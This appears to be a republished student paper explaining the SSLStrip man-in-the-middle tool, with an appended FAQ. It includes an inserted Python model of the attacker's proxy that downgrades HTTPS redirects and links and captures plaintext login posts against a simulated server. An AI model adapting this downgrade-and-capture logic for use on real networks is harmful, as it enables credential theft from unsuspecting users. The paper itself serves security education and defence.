This paper discusses SSLStrip, a tool used to carry out man-in-the-middle attacks against SSL-enabled websites. By today's standards, SSL-enabled sites are essential to banking institutions and online shops. The discussion begins with how the tool is used and how to defend against it, then builds on the weaknesses exposed by this type of attack, and closes with a review of the material and additional observations on websites and their use of SSL.
Man in the Middle Attack: Focus on SSLStrip
SSL-enabled websites are supposed to offer security and peace of mind: the confidence to use your computer to shop or to check your bank balance. While SSL is safe when used properly, there is a tool that attackers can turn against the public. That tool is SSLStrip. Used in a man-in-the-middle attack, it lets an attacker harvest personal information from users who believe they are on a secure page.
Introduction
SSLStrip was written by the independent security researcher Moxie Marlinspike and presented at the Black Hat DC conference in Washington, D.C. in 2009. When it was demonstrated, it became clear that this class of attack had received little attention until then. As Marlinspike's personal website describes it, “It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.” (Marlinspike). The tool has obvious appeal to attackers ranging from inexperienced “script kiddies” to professionals who make a living stealing personal information from unsuspecting users. The implementation also offers more advanced modes and options; for example, the attacker can have the tool substitute a padlock favicon for the site's own, so that a lock icon appears next to the address in the browser and further reassures the user. The entire purpose of SSLStrip is to deceive the user, and the deception happens without an inexperienced user noticing that anything has changed.
A review of SSLStrip explains: “The root of the problem of the man-in-the-middle attack is the way that browsers and web sites currently deal with SSL encryption on web pages.” (Enrielt). In a man-in-the-middle attack using SSLStrip, the victim's browser never negotiates SSL at all, so it never displays the harsh warnings it would show for a forged or expired certificate; the attacker's proxy is the only party that talks to the real HTTPS server. Ordinary users will not notice the missing lock icon or the missing “s” in https:// in the address bar. Most users never type https:// or http:// into the address bar; they reach secure pages through redirects from http://. SSLStrip works by having that traffic routed to itself and acting as a proxy. For example, a user opens a browser and searches for Gmail. The user clicks the Gmail link, and where Gmail would normally redirect the browser to an SSL-enabled login page, SSLStrip receives that redirect, strips the SSL-enabled features and hands the user a non-SSL version of the login screen. The attacker can then listen with a packet sniffer and see all traffic sent over the user's plain HTTP connection. A 2009 Carnegie Mellon University study found that, with Firefox 3, 31% of participants ignored the unknown certificate authority warning (Sunshine). Many users, myself included, have grown almost as accustomed to such warnings as to banner ads on a web page.
The attack
In a classic man-in-the-middle attack, the attacker gains access to information he or she would not normally be able to see by placing themselves electronically between a user and a server. An article states: “SSLStrip does not demonstrate a weakness in SSL encryption, but rather takes advantage of users who fail to look for trusted SSL encryption when sending sensitive information over the Internet.” (DigiCert EV SSL Certificates Protect Users From SSLstrip and Man-in-the-Middle Attacks). Many websites let users arrive over http:// and redirect them to an SSL-enabled page only when credentials or personal information are required. That redirect is the weak point: it travels in plaintext, so it can be intercepted and rewritten, and the user never reaches the intended destination securely.
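The redirect interception described in the two passages above, as an added example that is not part of the original paper or of the SSLStrip code: a Python model of the proxy's rewriting logic. The origin server, the host name bank.example and the credentials are constructed for the example; real SSLStrip additionally needs the victim's traffic routed to it (ARP spoofing and iptables), which is not modelled here.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Any absolute https:// URL inside an HTML body (href, action, src, ...).
HTTPS_URL = re.compile(r"""https://[^\s"'<>]+""", re.IGNORECASE)


@dataclass
class Response:
    status: int
    headers: dict
    body: str


# Constructed stand-in for the origin web server; 'bank.example' is a
# hypothetical host. It behaves like the sites the paper describes: the
# plain-HTTP landing page redirects to HTTPS, and the login form posts over HTTPS.
def origin_server(method: str, url: str, body: str = "") -> Response:
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.path == "/login":
        return Response(302, {"Location": "https://bank.example/login"}, "")
    if parts.scheme == "https" and parts.path == "/login" and method == "GET":
        html = ('<form method="post" action="https://bank.example/login">'
                '<input name="user"><input name="pass" type="password"></form>')
        return Response(200, {"Content-Type": "text/html"}, html)
    if parts.scheme == "https" and parts.path == "/login" and method == "POST":
        return Response(200, {"Content-Type": "text/html"}, "welcome")
    return Response(404, {}, "not found")


class StripProxy:
    """Attacker-side proxy modelled on SSLStrip's behaviour. The victim's
    browser only ever speaks plain HTTP to this proxy; the proxy speaks
    HTTPS to the real server whenever the server insisted on it."""

    def __init__(self, upstream=origin_server):
        self.upstream = upstream
        self.stripped = set()   # http:// URLs that were really https://
        self.captured = []      # (url, body) of plaintext requests seen

    def _downgrade(self, url: str) -> str:
        """Rewrite https:// to http:// and remember that we did so."""
        if url.lower().startswith("https://"):
            plain = "http://" + url[len("https://"):]
            self.stripped.add(plain)
            return plain
        return url

    def _upgrade(self, url: str) -> str:
        """Restore https:// for URLs we previously stripped, so the real
        server still sees the secure request it expects."""
        if url in self.stripped:
            return "https://" + url[len("http://"):]
        return url

    def handle(self, method: str, client_url: str, body: str = "") -> Response:
        if body:
            self.captured.append((client_url, body))   # readable by a sniffer
        resp = self.upstream(method, self._upgrade(client_url), body)
        # Turn a redirect-to-HTTPS into a redirect-to-HTTP.
        if "Location" in resp.headers:
            resp.headers["Location"] = self._downgrade(resp.headers["Location"])
        # Rewrite every https:// link or form action in the HTML body.
        if resp.headers.get("Content-Type", "").startswith("text/html"):
            resp.body = HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), resp.body)
        return resp


def simulate_victim(proxy: StripProxy) -> dict:
    """Acts like a browser that typed the bare host name into the address bar:
    starts on http://, follows redirects, then submits the form it is given."""
    url = "http://bank.example/login"
    resp = proxy.handle("GET", url)
    while resp.status in (301, 302):
        url = resp.headers["Location"]
        resp = proxy.handle("GET", url)
    action = re.search(r'action="([^"]+)"', resp.body).group(1)
    submit = proxy.handle("POST", action, "user=alice&pass=hunter2")   # constructed credentials
    return {"landed_on": url, "form_action": action, "login_status": submit.status}


if __name__ == "__main__":
    proxy = StripProxy()
    print(simulate_victim(proxy))
    print("captured:", proxy.captured)
```

The browser in this model starts on http:// and follows redirects, so it ends up posting the login form in plaintext through the proxy while the proxy completes the HTTPS exchange with the server, which is why the server sees a normal login and the browser sees no certificate warning. The downgrade depends entirely on that first plain-HTTP request: a site that is only ever reached over HTTPS (for instance through a bookmarked https:// URL or, in later browsers, an HSTS policy) gives the proxy no redirect to rewrite.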
In the following section I explain exactly how to implement this attack so that each step can be described in detail. For my attack I use the Linux distribution Backtrack, which is open source and available at http://www.backtrack-linux.org/. For the purposes of this example, I do not discuss iptables/networking or the specific command options issued to each tool.
Frequently asked questions
What is the main focus of the text "Man in the Middle Attack: Focus on SSLStrip"?
The text primarily focuses on the SSLStrip tool and its use in man-in-the-middle attacks to intercept and potentially steal personal information from unsuspecting users, despite the presence of SSL encryption on websites.
What is SSLStrip?
SSLStrip is a tool created by Moxie Marlinspike that transparently hijacks HTTP traffic, watches for HTTPS links and redirects, and then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. This deceives users into using non-SSL enabled versions of websites without them knowing.
How does SSLStrip work in a man-in-the-middle attack?
SSLStrip sits between the browser and the server and intercepts the redirect from an HTTP page to its HTTPS counterpart. Instead of letting the browser follow the redirect to the secure site, SSLStrip fetches the HTTPS page itself and serves the browser a plain HTTP copy with every https:// link rewritten to http://. The attacker can then read the unencrypted traffic.
Why is SSLStrip effective?
SSLStrip is effective because many users don't pay close attention to security indicators such as the lock icon or the "s" in "https://" in the address bar. They also may ignore certificate warnings or have become desensitized to them. Additionally, many websites rely on redirects from HTTP to HTTPS, which SSLStrip can intercept.
What is a man-in-the-middle attack?
A man-in-the-middle attack involves an attacker placing themselves electronically between a user and a server, allowing them to intercept and potentially manipulate the data being transmitted.
Does SSLStrip exploit a weakness in SSL encryption?
No, SSLStrip does not exploit a weakness in SSL encryption itself. It takes advantage of users who fail to verify that they are using trusted SSL encryption when sending sensitive information online.
How do websites contribute to the vulnerability exploited by SSLStrip?
Many websites implement redirects that enable users to visit their website through HTTP initially, and then redirect to HTTPS when sensitive information is required. This practice creates a point of interception that SSLStrip can exploit.
What Linux distribution is recommended for demonstrating an SSLStrip attack in the text?
The text recommends using the Backtrack Linux distribution, an open-source penetration testing platform.
What is the normal transaction flow when visiting a secure website, and how does SSLStrip interfere?
Normally the browser sends an HTTP request, the server answers with a redirect to HTTPS, and the browser then opens an SSL connection, receives and checks the server's certificate, and loads the page encrypted. SSLStrip interferes by intercepting that redirect: it opens the HTTPS connection to the legitimate server itself and relays the content to the browser over plain HTTP, so the browser never sees a certificate at all.
- Quote paper
- Jordan Elks (Author), 2011, Man in the Middle Attack: Focus on SSLStrip, Munich, GRIN Verlag, https://www.hausarbeiten.de/document/170676